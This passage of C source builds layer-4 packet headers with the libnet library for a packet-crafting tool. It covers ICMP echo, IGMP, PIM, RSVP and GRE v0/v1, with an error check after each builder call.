fprintf(stderr, "Can't build SCTP header: %s\n", libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_ICMP) {
u_int8_t icmp_type;
if (packet_vars->l3_pkt_type & L3_PKT_TYPE_IPV4) {
if (packet_vars->icmp.type == ICMP_TYPE_ECHO_REQ) {
icmp_type = ICMP_ECHO;
} else if (packet_vars->icmp.type == ICMP_TYPE_ECHO_REPLY) {
icmp_type = ICMP_ECHOREPLY;
} else {
fprintf(stderr, "Unsupported ICMP type: %d\n", packet_vars->icmp.type);
return(-1);
}
printf("---Building ICMPv4 packet\n");
} else if (packet_vars->l3_pkt_type & L3_PKT_TYPE_IPV6) {
if (packet_vars->icmp.type == ICMP_TYPE_ECHO_REQ) {
icmp_type = ICMP6_ECHO;
} else if (packet_vars->icmp.type == ICMP_TYPE_ECHO_REPLY) {
icmp_type = ICMP6_ECHOREPLY;
} else {
fprintf(stderr, "Unsupported ICMP type: %d\n", packet_vars->icmp.type);
return(-1);
}
printf("---Building ICMPv6 packet\n");
} else {
fprintf(stderr, "Unsupported L3 type %d for ICMP\n",
packet_vars->l3_pkt_type);
return(-1);
}
t = libnet_build_icmpv4_echo(
icmp_type, /* type */
0, /* code */
packet_vars->icmp.checksum, /* checksum */
packet_vars->icmp.id, /* id */
packet_vars->icmp.seq, /* sequence number */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1) {
fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_IGMP) {
printf("---Building IGMP packet\n");
t = libnet_build_igmp(
packet_vars->igmp.type, /* IGMP type */
0, /* IGMP code (unused in v1 and v2) */
packet_vars->igmp.checksum, /* checksum */
packet_vars->igmp.grp_ip, /* Group host IP */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1) {
fprintf(stderr, "Can't build IGMP header: %s\n", libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_PIM) {
printf("---Building PIM packet\n");
t = libnet_build_pim(
packet_vars->pim.version, /* PIM version */
packet_vars->pim.type, /* PIM type */
packet_vars->pim.checksum, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1) {
fprintf(stderr, "Can't build PIM header: %s\n", libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_RSVP) {
printf("---Building RSVP packet\n");
t = libnet_build_rsvp(
packet_vars->rsvp.version, /* RSVP version */
packet_vars->rsvp.flags, /* RSVP flags */
packet_vars->rsvp.type, /* RSVP mesg type */
packet_vars->rsvp.do_chksum, /* 1 - pkt is chksummed, 0, its not */
packet_vars->rsvp.checksum, /* checksum */
packet_vars->rsvp.ttl, /* IP TTL */
LIBNET_RSVP_H + payload_s, /* pkt len */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1) {
fprintf(stderr, "Can't build RSVP header: %s\n", libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_GRE) {
/* update l4_len */
uint16_t flag_ver = 0;
uint16_t type = 0;
uint16_t len = 0;
printf("---Building GRE,v0 packet\n");
if (packet_vars->gre.csum) {
flag_ver |= GRE_CSUM;
}
if (packet_vars->gre.rout) {
flag_ver |= GRE_ROUTING;
}
if (packet_vars->gre.key) {
flag_ver |= GRE_KEY;
}
if (packet_vars->gre.seq) {
flag_ver |= GRE_SEQ;
}
flag_ver |= GRE_VERSION_0;
type = libnet_get_ethernet_proto(packet_vars);
len = libnet_getgre_length(flag_ver);
packet_vars->l4_len += (len - LIBNET_GRE_H);
packet_vars->payload.data_length += (len - LIBNET_GRE_H);
len += payload_s;
t = libnet_build_gre(
flag_ver, /* flags and version fields */
type, /* protocol type */
packet_vars->gre.checksum, /* checksum */
0, /* offset */
packet_vars->gre.key_val, /* key */
packet_vars->gre.seq_num, /* sequence number */
len, /* GRE pkt length */
payload,
payload_s,
l,
0);
if (t == -1) {
fprintf(stderr, "Can't build GRE,v0 header: %s\n", libnet_geterror(l));
return(-1);
}
} else if (packet_vars->l4_pkt_type & L4_PKT_TYPE_EGRE) {
/* update l4_len */
uint16_t flag_ver = 0;
uint16_t len = 0;
printf("---Building GRE,v1 packet\n");
flag_ver |= GRE_KEY;
if (packet_vars->egre.seq) {
flag_ver |= GRE_SEQ;
}
if (packet_vars->egre.ack) {
flag_ver |= GRE_ACK;
}
flag_ver |= GRE_VERSION_1;
len = libnet_getgre_length(flag_ver);
packet_vars->l4_len += (len - LIBNET_GRE_H);
packet_vars->payload.data_length += (len - LIBNET_GRE_H);
len += payload_s;
t = libnet_build_egre(
flag_ver, /* flags and version fields */
0x880b, /* protocol type */
payload_s, /* payload length */
0, /* call ID */
packet_vars->egre.seq_num, /* sequence number */
packet_vars->egre.ack_num, /* ack number */
len, /* GRE pkt length */
payload,
payload_s,
l,
0);
if (t == -1) {
fprintf(stderr, "Can't build GRE,v1 header: %s\n", libnet_geterror(l));
return(-1);
}
} else {/*??*/
printf("UNSUPPORTED PKT_TYPE !! \n");
return(-1);
}
return(1);
}